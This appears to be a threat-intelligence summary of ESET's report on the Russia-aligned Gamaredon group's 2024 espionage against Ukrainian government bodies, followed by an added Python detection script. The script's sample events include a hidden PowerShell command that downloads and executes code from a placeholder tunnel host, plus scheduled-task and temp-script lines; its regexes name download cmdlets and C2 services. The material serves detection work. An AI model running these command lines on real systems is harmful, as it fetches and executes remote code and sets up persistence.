ESET Research analyzes Gamaredon’s updated cyberespionage toolset, new stealth-focused techniques, and aggressive spearphishing operations observed throughout 2024
Analysis Summary
# Threat Actor: Gamaredon
## Attribution & Identity
Attributed by the Security Service of Ukraine (SSU) to **Russia’s Federal Security Service (FSB), specifically the 18th Center of Information Security**. The actor is a Russia-aligned Advanced Persistent Threat (APT) group focused on cyberespionage.
## Activity Summary
Gamaredon has relentlessly targeted Ukrainian entities since at least 2013. In 2024, the group **refocused exclusively on targeting Ukrainian governmental institutions**, abandoning prior attempts against NATO countries. The scale and frequency of its spearphishing campaigns significantly increased throughout the second half of 2024. The group introduced several new stealth-focused tools and significantly upgraded existing ones to improve persistence and lateral movement against its exclusive targets in Ukraine.
## Tactics, Techniques & Procedures
- **Spearphishing:** Increased frequency, employing malicious archives (RAR, ZIP, 7z) or XHTML files using HTML smuggling.
- **Delivery Methods:** Used malicious HTA or LNK files that executed embedded VBScript downloaders (e.g., PteroSand).
- **Novel Delivery:** Used malicious LNK files to execute PowerShell commands directly from Cloudflare-hosted domains.
- **Infrastructure Evasion:** Heavily relied on Cloudflare Tunnels to hide Command and Control (C&C) infrastructure.
- **C&C Obfuscation:** Leveraged third-party services (Telegram, Telegraph, Dropbox) and DNS-over-HTTPS (DoH) services (Google, Cloudflare) for communication protection.
- **Domain Resolution:** Resolved C&C domains in a separate step, using embedded HTA and VBScript files dropped into temporary directories.
- **Persistence/Lateral Movement:** Updated tools concentrated on these areas; an older persistence method relied on Excel add-ins, while newer methods use scheduled tasks.
## Targeting
- Sectors: Governmental institutions.
- Geography: Exclusively **Ukraine** in 2024. Prior years included occasional attempts against NATO countries.
- Victims: Ukrainian governmental institutions.
## Tools & Infrastructure
- **New Malware (2024):**
  - **PteroDespair:** PowerShell reconnaissance tool for collecting diagnostic data.
  - **PteroTickle:** PowerShell tool for lateral movement that weaponizes Python applications converted to executables by tampering with their Tcl scripts.
  - **PteroGraphin:** PowerShell tool that uses the Telegraph API for encrypted communication; it initially relied on Excel add-ins for persistence and later switched to scheduled tasks.
  - **PteroStew:** New general-purpose VBScript downloader.
- **Infrastructure:** Heavily obfuscated C&C infrastructure hidden behind **Cloudflare Tunnels** (using Cloudflare-generated subdomains as primary endpoints). Fallback relied on traditional domains. Used DoH services and third-party resolver websites (nslookup[.]io, who[.]is, dnswatch[.]info, check-host[.]net).
## Implications
Gamaredon remains a highly active and persistent cyberespionage threat, closely aligned with Russian geopolitical motives concerning the conflict in Ukraine. Despite perceived capacity limitations, its commitment to constant toolset evolution, aggressive spearphishing, and sophisticated infrastructure obfuscation (leveraging Cloudflare Tunnels and DoH) makes it difficult to detect and thwart. The exclusive focus on Ukrainian state entities suggests sustained, high-priority intelligence gathering objectives for the foreseeable future.
## Mitigations
- Implement robust detection mechanisms for PowerShell execution originating from non-standard locations or parent processes, especially PowerShell launched via LNK files that fetches its payload directly from cloud-hosted downloaders.
- Monitor for the use of third-party services (Cloudflare, Telegram, Dropbox, Telegraph) for C&C communications.
- Harden endpoint protection against common initial access vectors like malicious archives (RAR, ZIP, 7z) and HTML smuggling techniques.
- Focus monitoring on persistence mechanisms like custom scheduled tasks and suspicious activity related to Microsoft Excel add-ins.
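One way to turn the detection items above into code, as an added example that is not ESET's code or anything from the report: a small rule set run over constructed process-creation events shaped like Sysmon Event ID 1 fields (image, parent image, command line). The quick-tunnel domain trycloudflare.com and the DoH and resolver endpoints are assumptions drawn from general knowledge, not values the summary provides.

```python
import re

# Added example, not code from ESET or the report: a small detection pass over
# constructed process-creation events (Sysmon Event ID 1 style fields). Assumed
# domains: trycloudflare.com (Cloudflare quick tunnels), DoH and resolver endpoints.
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
NET_RE = re.compile(
    r"trycloudflare\.com|telegra\.ph|api\.telegram\.org|dropbox(usercontent)?\.com"
    r"|dns\.google|cloudflare-dns\.com"                       # DoH resolvers
    r"|nslookup\.io|who\.is|dnswatch\.info|check-host\.net",  # resolver websites
    re.I,
)
DOWNLOAD_RE = re.compile(r"iwr|invoke-webrequest|downloadstring|net\.webclient|iex", re.I)
TASK_RE = re.compile(r"schtasks(\.exe)?\s+/create|register-scheduledtask", re.I)
TEMP_RE = re.compile(r"\\(appdata\\local\\)?temp\\[^\s\"]+\.(vbs|hta|ps1)", re.I)

def basename(path: str) -> str:
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()

def classify(event: dict) -> list:
    """Return the names of the rules an event matches (empty list means clean)."""
    image = basename(event.get("Image", ""))
    parent = basename(event.get("ParentImage", ""))
    cmd = event.get("CommandLine", "")
    hits = []
    if image not in SCRIPT_HOSTS:
        return hits
    # LNK double-clicks are launched by explorer.exe; a script host it spawns that downloads at once
    if parent == "explorer.exe" and DOWNLOAD_RE.search(cmd):
        hits.append("downloader-from-explorer")
    if NET_RE.search(cmd):
        hits.append("third-party-c2-or-resolver-domain")
    if parent in SCRIPT_HOSTS and TEMP_RE.search(cmd):
        hits.append("script-chain-from-temp")  # HTA/VBScript helper dropped in %TEMP%
    if TASK_RE.search(cmd):
        hits.append("scheduled-task-from-script-host")
    return hits

# Constructed sample events, not real telemetry.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": 'powershell -w hidden -c "iwr https://placeholder-tunnel.trycloudflare.com/p | iex"'},
    {"Image": r"C:\Windows\System32\wscript.exe",
     "ParentImage": r"C:\Windows\System32\mshta.exe",
     "CommandLine": r'wscript.exe "C:\Users\u\AppData\Local\Temp\resolve.vbs"'},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\wscript.exe",
     "CommandLine": 'powershell -c "schtasks /create /sc minute /mo 10 /tn Upd /tr C:\\x.hta"'},
]
```

Each sample event trips a different rule, so the output of `classify` over `SAMPLE_EVENTS` shows which of the report's behaviours (LNK-launched downloader, Cloudflare-hosted endpoint, temp-directory script chain, scheduled-task persistence) a given telemetry line matches.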